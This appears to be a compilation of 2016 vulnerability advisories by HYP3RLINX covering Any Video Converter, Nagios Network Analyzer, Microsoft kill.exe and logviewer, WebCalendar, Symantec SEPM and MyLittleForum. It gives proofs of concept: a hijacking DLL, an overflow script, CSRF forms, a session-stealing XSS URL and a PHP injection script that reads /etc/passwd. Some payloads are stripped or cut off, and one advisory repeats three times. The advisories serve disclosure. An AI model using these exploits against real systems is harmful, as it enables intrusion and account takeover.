it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. HYP3RLINX
Any Video Converter DLL Hijack
[+] Credits: HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/ANY-VIDEO-CONVERTER-DLL-HIJACK.txt
[+] ISR: ApparitionSec
Vendor:
===
www.any-video-converter.com
Product:
AVCSoft / Any Video Converter v5.9.5
AVCFree.exe is a Video downloader and converter.
Vulnerability Type:
DLL Hijack
CVE Reference:
==
N/A
Vulnerability Details:
=
Vuln DLL: libx265_main10.dll
AVCFree.exe will search for an load any DLL named "libx265_main10.dll". If an
attacker can place the DLL in a location
where victim opens a file in AVCFree it will load and run the attackers DLL and
code.
In testing I notice if the file type is associated with AVCFree.exe as default
program to open with then double clicking
the file will load and execute the vuln DLL. If file type is not associated
with AVCFree then right clicking and choosing
to open with AVCFree will do the same.
Right click or Double click and open in AVCFree.exe following file types then
BOOM.
.mp4, .mp3, .mpg, mpeg, .iso, .divx, .wav, .flv, .avs, .mov
and probably more...
Exploit code(s):
===
1) Save and compile below C code as 'libx265_main10.c' to create vuln DLL
2) Place on remote share or other directory like "downloads"
3) Right click or Double Click an .mpg file or any of extensions listed above
to open with AVCFree.exe then BOOM!
#include
//gcc -c libx265_main10.c
//gcc -shared -o libx265_main10.dll libx265_main10.o
BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
switch (reason) {
case DLL_PROCESS_ATTACH:
MessageBox(NULL, "Arbitrary Code Exec", "PWNED!", MB_OK);
break;
}
return 0;
}
Disclosure Timeline:
===
Vendor Notification: No Replies
August 8, 2016 : Public Disclosure
Severity Level:
Medium
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
Nagios Network Analyzer v2.2.1 Multiple CSRF
[+] Credits: John Page -hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/NAGIOS-NA-v2.2.1-MULTIPLE-CSRF.txt [+] ISR: ApparitionSec Vendor: === www.nagios.com Product: == Nagios Network Analyzer v2.2.1 Netflow Analysis, Monitoring, and Bandwidth Utilization Software Network Analyzer provides an in-depth look at all network traffic sources and potential security threats allowing system admins to quickly gather high-level information regarding the health of the network as well as highly granular data for complete and thorough network analysis. Vulnerability Type: = Cross Site Request Forgery (CSRF) CVE Reference: == N/A Vulnerability Details: = Nagios NA has multiple CSRF vectors, allowing unauthorized commands to be transmitted from a user that the website trusts if that user is authenticated and visits a malicious webpage or clicks a attacker supplied link. The Nagios system can be compromised as remote attackers can create arbitrary commands e.g. using "wget" to download RCE files onto the system, create arbitrary Admins, delete users, and conduct DOS attacks. Exploit code(s): 1) Create arbitrary commands http://victim-server/nagiosna/index.php/api/system/create_command; method="post"> document.forms[0].submit() 2) Add Admin http://victim-server/nagiosna/index.php/admin/users/create; method="post" accept-charset="utf-8"> document.forms[0].submit() 3) Delete reports (report ID must be known or guessed) http://victim-server/nagiosna/index.php/api/reports/delete; method="post"> document.forms[0].submit() 4) DOS http://victim-server/nagiosna/index.php/api/system/stop; method="post"> //document.forms[0].submit() 5) Delete users (user ID must be known or guessed) http://victim-server/nagiosna/index.php/admin/users/delete; method="post"> document.forms[0].submit() Disclosure Timeline: == Vendor Notification: July 20, 2016 Vendor Acknowledgement: July 21, 2016 Vendor Fix / Release: August 1, 2016 August 8, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: === Medium [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. HYP3RLINX
Microsoft Process Kill Utility "kill.exe" Buffer Overflow
[+] Credits: HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MS-KILL-UTILITY-BUFFER-OVERFLOW.txt [+] ISR: ApparitionSec Vendor: = www.microsoft.com Product: = Microsoft Process Kill Utility "kill.exe" File version: 6.3.9600.17298 The Kill tool (kill.exe), a tool used to terminate a process, part of the WinDbg program. Vulnerability Type: === Buffer Overflow SEH Buffer Overflow @ about 512 bytes Vulnerability Details: = Register dump 'SEH chain of main thread AddressSE handler 001AF688 kernel32.756F489B 001AFBD8 52525252 42424242 *** CORRUPT ENTRY *** 001BF81C 41414141 001BF820 41414141 001BF824 41414141 001BF828 41414141 001BF82C 41414141 001BF830 41414141 001BF834 909006EB Ă« Pointer to next SEH record 001BF838 52525252 SE handler < 001BF83C 90909090 001BF840 90909090 Exploit code(s): Python POC. import subprocess junk="A"*508+"" pgm='c:\\Program Files (x86)\\Windows Kits\\8.1\\Debuggers\\x86\\kill.exe ' subprocess.Popen([pgm, junk], shell=False) Disclosure Timeline: == Vendor Notification: June 24, 2016 Vendor reply: Will not security service July 8, 2016 : Public Disclosure Exploitation Technique: === Local Severity Level: Low [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. HYP3RLINX
Microsoft WinDbg logviewer.exe Buffer Overflow DOS
[+] Credits: HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MS-WINDBG-LOGVIEWER-BUFFER-OVERFLOW.txt [+] ISR: ApparitionSec Vendor: = www.microsoft.com Product: WinDbg logviewer.exe LogViewer (logviewer.exe), a tool that displays the logs created, part of WinDbg application. Vulnerability Type: === Buffer Overflow DOS Vulnerability Details: = Buffer overflow in WinDbg "logviewer.exe" when opening corrupted .lgv files. App crash then Overwrite of MMX registers etc... this utility belongs to Windows Kits/8.1/Debuggers/x86 Read Access Violation / Memory Corruption Win32 API Log Viewer 6.3.9600.17298 Windbg x86 logviewer.exe Log Viewer 3.01 for x86 (5fb8.32fc): Access violation - code c005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\syswow64\msvcrt.dll - eax=013dad30 ebx=005d ecx=0041 edx= esi=005d2000 edi=013dcd30 eip=754fa048 esp=0009f840 ebp=0009f848 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 msvcrt!memmove+0x1ee: 754fa048 660f6f06movdqa xmm0,xmmword ptr [esi] ds:002b:005d2000= gs 2b fs 53 es 2b ds 2b edi 136cd30 esi 7d2000 ebx 7d edx 0 ecx 41 eax 136ad30 ebp df750 eip 754fa048 cs 23 efl 210206 esp df748 ss 2b dr0 0 dr1 0 dr2 0 dr3 0 dr6 0 dr7 0 di cd30 si 2000 bx 0 dx 0 cx 41 ax ad30 bp f750 ip a048 fl 206 sp f748 bl 0 dl 0 cl 41 al 30 bh 0 dh 0 ch 0 ah ad fpcw 27f fpsw 4020 fptw fopcode 0 fpip 76454c1e fpipsel 23 fpdp 6aec2c fpdpsel 2b st0 -1.00e+000 st1 -1.00e+000 st2 -1.00e+000 st3 9.60e+001 st4 1.08506945252884e-004 st5 -1.00e+000 st6 0.00e+000 st7 0.00e+000 mm0 0:2:2:2 mm1 0:0:2:202 mm2 0:1:1:1 mm3 c000:0:0:0 mm4 e38e:3900:0:0 mm5 0:0:0:0 mm6 0:0:0:0 mm7 0:0:0:0 mxcsr 1fa0 xmm0 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 xmm1 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 xmm2 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 xmm3 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 xmm4 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 xmm5 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 xmm6 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 xmm7 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 iopl 0 of 0 df 0 if 1 tf 0 sf 0 zf 0 af 0 pf 1 cf 0 vip 0 vif 0 xmm0l 4141:4141:4141:4141 xmm1l 4141:4141:4141:4141 xmm2l 4141:4141:4141:4141 xmm3l 4141:4141:4141:4141 xmm4l 4141:4141:4141:4141 xmm5l 4141:4141:4141:4141 xmm6l 4141:4141:4141:4141 xmm7l 4141:4141:4141:4141 xmm0h 4141:4141:4141:4141 xmm1h 4141:4141:4141:4141 xmm2h 4141:4141:4141:4141 xmm3h 4141:4141:4141:4141 xmm4h 4141:4141:4141:4141 xmm5h 4141:4141:4141:4141 xmm6h 4141:4141:4141:4141 xmm7h 4141:4141:4141:4141 xmm0/0 41414141 xmm0/1 41414141 xmm0/2 41414141 xmm0/3 41414141 xmm1/0 41414141 xmm1/1 41414141 xmm1/2 41414141 xmm1/3 41414141 xmm2/0 41414141 xmm2/1 41414141 xmm2/2 41414141 xmm2/3 41414141 xmm3/0 41414141 xmm3/1 41414141 xmm3/2 41414141 xmm3/3 41414141 xmm4/0 41414141 xmm4/1 41414141 xmm4/2 41414141 xmm4/3 41414141 xmm5/0 41414141 xmm5/1 41414141 xmm5/2 41414141 xmm5/3 41414141 xmm6/0 41414141 xmm6/1 41414141 xmm6/2 41414141 xmm6/3 41414141 xmm7/0 41414141 xmm7/1 41414141 xmm7/2 41414141 xmm7/3 41414141 Exploit code(s): === 1) create .lgv file with bunch of 'A's length of 4096 overwrites XXM registers, ECX etc 2) run from command line pipe the file to it to watch it crash and burn. /// Disclosure Timeline: === Vendor Notification: June 23, 2016 Vendor acknowledged: July 1, 2016 Vendor reply: Will not fix (stability issue) July 8, 2016 : Public Disclosure Severity Level: Low [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. HYP3RLINX
WebCalendar v1.2.7 CSRF Protection Bypass
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-CSRF-PROTECTION-BYPASS.txt
[+] ISR: ApparitionSec
Vendor:
==
www.k5n.us/webcalendar.php
Product:
==
WebCalendar v1.2.7
WebCalendar is a PHP-based calendar application that can be configured as a
single-user calendar, a multi-user calendar for groups of users, or as an
event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2, Interbase,
MS SQL Server, or ODBC is required.
WebCalendar can be setup in a variety of ways, such as...
A schedule management system for a single person
A schedule management system for a group of people, allowing one or more
assistants to manage the calendar of another user
An events schedule that anyone can view, allowing visitors to submit new events
A calendar server that can be viewed with iCalendar-compliant calendar
applications like Mozilla Sunbird, Apple iCal or GNOME Evolution or RSS-enabled
applications like Firefox, Thunderbird, RSSOwl, FeedDemon, or BlogExpress.
Vulnerability Type:
==
CSRF PROTECTION BYPASS
CVE Reference:
==
N/A
Vulnerability Details:
=
WebCalendar attempts to uses the HTTP Referer to check that requests are
originating from same server as we see below.
>From WebCalendar "include/functions.php" file on line 6117:
function require_valide_referring_url ()
{
global $SERVER_URL;
if ( empty( $_SERVER['HTTP_REFERER'] ) ) {
// Missing the REFERER value
//die_miserable_death ( translate ( 'Invalid referring URL' ) );
// Unfortunately, some version of MSIE do not send this info.
return true;
}
if ( ! preg_match ( "@$SERVER_URL@i", $_SERVER['HTTP_REFERER'] ) ) {
// Gotcha. URL of referring page is not the same as our server.
// This can be an instance of XSRF.
// (This may also happen when more than address is used for your server.
// However, you're not supposed to do that with this version of
// WebCalendar anyhow...)
die_miserable_death ( translate ( 'Invalid referring URL' ) );
}
}
/
However, this can be easily defeated by just not sending a referer. HTML 5
includes a handy tag to omit the referer
when making an HTTP request, currently supported in Chrome, Safari,
MobileSafari and other WebKit-based browsers. Using this meta tag we send no
referrer
and the vulnerable application will then happily process our CSRF requests.
Exploit code(s):
===
1) CSRF Protection Bypass to change Admin password POC. Note: Name of the
victim user is required for success.
http://localhost/WebCalendar-1.2.7/edit_user_handler.php;
method="post">
2) CSRF Protection Bypass modify access controls under "System Settings" /
"Allow public access"
http://localhost/WebCalendar-1.2.7/admin.php; method="post"
name="prefform">
document.getElementById('CSRF_ACCESS_CTRL').submit()
Disclosure Timeline:
===
Vendor Notification: No replies
July 4, 2016 : Public Disclosure
Exploitation Technique:
===
Remote
Severity Level:
6.8 (Medium)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
WebCalendar v1.2.7 CSRF Protection Bypass
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-CSRF-PROTECTION-BYPASS.txt
[+] ISR: ApparitionSec
Vendor:
==
www.k5n.us/webcalendar.php
Product:
==
WebCalendar v1.2.7
WebCalendar is a PHP-based calendar application that can be configured as a
single-user calendar, a multi-user calendar for groups of users, or as an
event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2, Interbase,
MS SQL Server, or ODBC is required.
WebCalendar can be setup in a variety of ways, such as...
A schedule management system for a single person
A schedule management system for a group of people, allowing one or more
assistants to manage the calendar of another user
An events schedule that anyone can view, allowing visitors to submit new events
A calendar server that can be viewed with iCalendar-compliant calendar
applications like Mozilla Sunbird, Apple iCal or GNOME Evolution or RSS-enabled
applications like Firefox, Thunderbird, RSSOwl, FeedDemon, or BlogExpress.
Vulnerability Type:
==
CSRF PROTECTION BYPASS
CVE Reference:
==
N/A
Vulnerability Details:
=
WebCalendar attempts to uses the HTTP Referer to check that requests are
originating from same server as we see below.
>From WebCalendar "include/functions.php" file on line 6117:
function require_valide_referring_url ()
{
global $SERVER_URL;
if ( empty( $_SERVER['HTTP_REFERER'] ) ) {
// Missing the REFERER value
//die_miserable_death ( translate ( 'Invalid referring URL' ) );
// Unfortunately, some version of MSIE do not send this info.
return true;
}
if ( ! preg_match ( "@$SERVER_URL@i", $_SERVER['HTTP_REFERER'] ) ) {
// Gotcha. URL of referring page is not the same as our server.
// This can be an instance of XSRF.
// (This may also happen when more than address is used for your server.
// However, you're not supposed to do that with this version of
// WebCalendar anyhow...)
die_miserable_death ( translate ( 'Invalid referring URL' ) );
}
}
/
However, this can be easily defeated by just not sending a referer. HTML 5
includes a handy tag to omit the referer
when making an HTTP request, currently supported in Chrome, Safari,
MobileSafari and other WebKit-based browsers. Using this meta tag we send no
referrer
and the vulnerable application will then happily process our CSRF requests.
Exploit code(s):
===
1) CSRF Protection Bypass to change Admin password POC. Note: Name of the
victim user is required for success.
http://localhost/WebCalendar-1.2.7/edit_user_handler.php;
method="post">
2) CSRF Protection Bypass modify access controls under "System Settings" /
"Allow public access"
http://localhost/WebCalendar-1.2.7/admin.php; method="post"
name="prefform">
document.getElementById('CSRF_ACCESS_CTRL').submit()
Disclosure Timeline:
===
Vendor Notification: No replies
July 4, 2016 : Public Disclosure
Exploitation Technique:
===
Remote
Severity Level:
6.8 (Medium)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
WebCalendar v1.2.7 CSRF Protection Bypass
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-CSRF-PROTECTION-BYPASS.txt
[+] ISR: ApparitionSec
Vendor:
==
www.k5n.us/webcalendar.php
Product:
==
WebCalendar v1.2.7
WebCalendar is a PHP-based calendar application that can be configured as a
single-user calendar, a multi-user calendar for groups of users, or as an
event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2, Interbase,
MS SQL Server, or ODBC is required.
WebCalendar can be setup in a variety of ways, such as...
A schedule management system for a single person
A schedule management system for a group of people, allowing one or more
assistants to manage the calendar of another user
An events schedule that anyone can view, allowing visitors to submit new events
A calendar server that can be viewed with iCalendar-compliant calendar
applications like Mozilla Sunbird, Apple iCal or GNOME Evolution or RSS-enabled
applications like Firefox, Thunderbird, RSSOwl, FeedDemon, or BlogExpress.
Vulnerability Type:
==
CSRF PROTECTION BYPASS
CVE Reference:
==
N/A
Vulnerability Details:
=
WebCalendar attempts to uses the HTTP Referer to check that requests are
originating from same server as we see below.
>From WebCalendar "include/functions.php" file on line 6117:
function require_valide_referring_url ()
{
global $SERVER_URL;
if ( empty( $_SERVER['HTTP_REFERER'] ) ) {
// Missing the REFERER value
//die_miserable_death ( translate ( 'Invalid referring URL' ) );
// Unfortunately, some version of MSIE do not send this info.
return true;
}
if ( ! preg_match ( "@$SERVER_URL@i", $_SERVER['HTTP_REFERER'] ) ) {
// Gotcha. URL of referring page is not the same as our server.
// This can be an instance of XSRF.
// (This may also happen when more than address is used for your server.
// However, you're not supposed to do that with this version of
// WebCalendar anyhow...)
die_miserable_death ( translate ( 'Invalid referring URL' ) );
}
}
/
However, this can be easily defeated by just not sending a referer. HTML 5
includes a handy tag to omit the referer
when making an HTTP request, currently supported in Chrome, Safari,
MobileSafari and other WebKit-based browsers. Using this meta tag we send no
referrer
and the vulnerable application will then happily process our CSRF requests.
Exploit code(s):
===
1) CSRF Protection Bypass to change Admin password POC. Note: Name of the
victim user is required for success.
http://localhost/WebCalendar-1.2.7/edit_user_handler.php;
method="post">
2) CSRF Protection Bypass modify access controls under "System Settings" /
"Allow public access"
http://localhost/WebCalendar-1.2.7/admin.php; method="post"
name="prefform">
document.getElementById('CSRF_ACCESS_CTRL').submit()
Disclosure Timeline:
===
Vendor Notification: No replies
July 4, 2016 : Public Disclosure
Exploitation Technique:
===
Remote
Severity Level:
6.8 (Medium)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
WebCalendar v1.2.7 PHP Code Injection
[+] Credits: John Page aka HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-PHP-CODE-INJECTION.txt [+] ISR: ApparitionSec Vendor: == www.k5n.us/webcalendar.php Product: == WebCalendar v1.2.7 WebCalendar is a PHP-based calendar application that can be configured as a single-user calendar, a multi-user calendar for groups of users, or as an event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2, Interbase, MS SQL Server, or ODBC is required. WebCalendar can be setup in a variety of ways, such as... A schedule management system for a single person A schedule management system for a group of people, allowing one or more assistants to manage the calendar of another user An events schedule that anyone can view, allowing visitors to submit new events A calendar server that can be viewed with iCalendar-compliant calendar applications like Mozilla Sunbird, Apple iCal or GNOME Evolution or RSS-enabled applications like Firefox, Thunderbird, RSSOwl, FeedDemon, or BlogExpress. Vulnerability Type: == PHP Code Injection CVE Reference: == N/A Vulnerability Details: = Since WebCalendars install script is not removed after installation as there is no "automatic" removal of it, low privileged users can inject arbitrary PHP code for the "Database Cache" directory value as no input validation exists for this when a user installs the application using the WebCalendar walk thru wizard. If WebCalendars installation script is available as part of a default image, often as a convenience by some hosting providers, this can be used to gain code execution on the target system. The only item that is required is the user must have privileges to authenticate to the MySQL Database and to run the install script. So, users who have install wizard access for the WebCalendar application will now have ability to launch arbitrary system commands on the affected host. One problem we must overcome is WebCalendar filters quotes " so we cannot use code like However, we can defeat this obstacle using the all to forgotten backtick `CMD` operator!. e.g. */?> This results in "settings.php" being injected like... readonly: false user_inc: user.php use_http_auth: false single_user: false # end settings.php */ ?> Exploitation steps(s): = 1) Login to the WebCalendar Installation Wizard. 2) When you get to WebCalendar Installation Wizard Step 2 of the install script. http://localhost/WebCalendar-1.2.7/WebCalendar-1.2.7/install/index.php?action=switch=2 3) Click "Test Settings" button to ensure connection to the Database. 4) Enter below PHP code for the "Database Cache Directory:" input fields value to pop calculator for POC (Windows). */?> 5) Click "Next" button 6) Click "Next" button 7) Click "Save settings" button BOOOM! "settings.php" gets overwritten and injected with our PHP code. If you happen to get following error when clicking "Test Settings" button, "Failure Reason: Database Cache Directory does not exist", just click back button then forward or just "Test settings" button again to try get past the error. Disclosure Timeline: === Vendor Notification: No Replies July 4, 2016 : Public Disclosure Severity Level: 8.0 (High) CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. HYP3RLINX
Symantec SEPM v12.1 Multiple Vulnerabilities
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/SYMANTEC-SEPM-MULTIPLE-VULNS.txt
[+] ISR: ApparitionSec
Vendor:
www.symantec.com
Product:
===
SEPM
Symantec Endpoint Protection Manager and client v12.1
SEPM provides a centrally managed solution. It handles security policy
enforcement, host integrity checking (Symantec Network Access Control only),
and automated remediation over all clients. The policies functionality is the
heart of the Symantec software. Clients connect to the server to get the
latest policies, security settings, and software updates.
Vulnerability Type(s):
==
Multiple Cross Site Scripting (XSS)
Cross Site Request Forgeries (CSRF)
Open Redirect
CVE Reference(s):
=
CVE-2016-3652 / XSS
CVE-2016-3653 / CSRF
CVE-2016-5304 / Open Redirect
Vulnerability Details:
=
The management console for SEPM contains a number of security vulnerabilities
that could be used by a lower-privileged user or by
an unauthorized user to elevate privilege or gain access to unauthorized
information on the management server. Exploitation attempts of
these vulnerabilities requires access to the SEP Management console.
References:
https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory=security_advisory==20160628_01
Exploit code(s):
===
In this case XSS can bypass the "http-only" cookie protection because the SEPM
application writes and stores the session ID within various
javascript functions used by the application within the DOM thereby exposing
them directly to the XSS attack.
1) createModalDialogFromURL
2) createWindowFromURL
3) createWindowFromForm
4) createIEWindowFromForm
So all we need to do is alert(createModalDialogFromURL) anyone one of them
(functions) an it will leak the session ID essentially throwing the
HttpOnly secure cookie protection flag into the garbage.
e.g.
XSS POC Defeat http-only flag and access PHPSESSID:
https://localhost:8445/Reporting/Admin/notificationpopup.php?New=1=CR=alert%28createModalDialogFromURL%29#
Open Redirect in external URL .php script:
=
A reporting URL used to route generated reports externally to any authorized
URL is susceptible to an open redirect vulnerability
that could have allowed an authorized but less-privileged user to redirect an
unsuspecting privileged user to an external URL to
attempt further exploitation, e.g. phishing.
If a victim clicks on a link supplied by an attacker
e.g.
https://localhost:8445/Reporting/common/externalurl.php?url=http://hyp3rlinx.altervista.org
Cross Site Request Forgery (CSRF):
==
Multiple Cross Site Request Forgery exists in couple of places within this
version of SEPM below is an example of sending scheduled report to
an remote attackers email, if current logged in user visits malicious webpage
or clicks infected link etc...
Symantec Reporting Admin CSRF POC:
https://localhost:8445/Reporting/Reports/sr-save.php;
method="POST" />
document.getElementById('PWN').submit()
Disclosure Timeline:
Vendor Notification: Febuary 11, 2016
Vendor Acknowledges Report: Febuary 12, 2016
Vendor Releases Fix: June 28, 2016
June 29, 2016 : Public Disclosure
Exploitation Technique:
===
Remote
Severity Level(s):
Cross Site Scripting
Medium
v2 6.8
AV:A/AC:M/Au:S/C:C/I:C/A:N
v3 6.7
AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
Cross Site Request Forgery
High
v2 7.0
AV:A/AC:M/Au:M/C:C/I:C/A:C
v3 7.1
AV:A/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Open Redirect
Medium
v2 4.1
AV:A/AC:L/Au:S/C:P/I:P/A:N
v3 4.1
AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
MyLittleForum v2.3.5 PHP Command Injection
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MYLITTLEFORUM-PHP-CMD-EXECUTION.txt
[+] ISR: APPARITIONSEC
Vendor:
=
mylittleforum.net
Download:
github.com/ilosuna/mylittleforum/releases/tag/v2.3.5
Product:
===
MyLittleForum 2.3.5
my little forum is a simple PHP and MySQL based internet forum that displays
the messages in classical threaded
view (tree structure). The main claim of this web forum is simplicity.
Furthermore it should be easy to install
and run on a standard server configuration with PHP and MySQL.
Vulnerability Type:
===
PHP Command Execution
CVE Reference:
==
N/A
Vulnerability Details:
=
When setting up mylittleforum CMS users will have to walk thru an installation
script and provide details for the application like the
forums email address, name, admin email, admin password, database name etc...
However, no input validation / checks exists for that installation script. Low
privileged users can then supply arbitrary PHP code for
the Database Name. The PHP command values will get written to the
config/db_settings.php file and processed by the application. Since
we supply an invalid Database Name a MySQL error will be thrown but the
injected PHP payload will also be executed on the host system.
If the CMS is installed by low privileged user and that user has basic MySQL
database authorization to run the install for the CMS it
can result in a privilege escalation, remote command execution and complete
takeover of the host server.
The /config/db_settings.php is protected by .htaccess file but we can write
directly to "db_settings.php" file and execute code directly
from /install/index.php file bypassing any access control provided by the
.htaccess file or we just delete it by adding call to PHP function
@unlink('.htaccess') to our injected PHP payload.
1) Browse to http://localhost/mylittleforum-2.3.5/install/index.php
2) For Database Name input field enter the below PHP code for POC.
';?>news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
etc...
Exploit code(s):
===
1) Download and unpack mylittleforum-2.3.5 upload to web server (Linux), chmod
-R 777 etc...
2) Run below PHP script from Command line from remote work station
3) BOOM we can now read Linux "/etc/passwd" file on remote server
,,,\r\n";
echo "= by hyp3rlinx ===\r\n";
exit();
}
$port=80; #Default port
$victim=$argv[1]; #IP
$user=$argv[2]; #MySQL username
$pwd=$argv[3]; #MySQL password
$root_dir=$argv[4]; #/mylittleforum-2.3.5
$uri="/install/index.php"; #PHP CMD inject entry point
$s = fsockopen($victim, $port, $errno, $errstr, 10);
if(!$s){echo "Cant connect to the server!"; exit();}
$CMD_INJECTTION="forum_name=PWN".
"_address=http://$victim/$root_dir/;.
"_email=x...@x.com".
"_name=$user".
"_email=x...@x.com".
"_pw=$pwd".
"_pw_conf=$pwd".
"=localhost".
"=';?>
Disclosure Timeline:
=
Vendor Notification: No Reply
June 27, 2016 : Public Disclosure
Exploitation Technique:
===
Remote
Severity Level:
===
(High) 8.7
CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
[+] Disclaimer
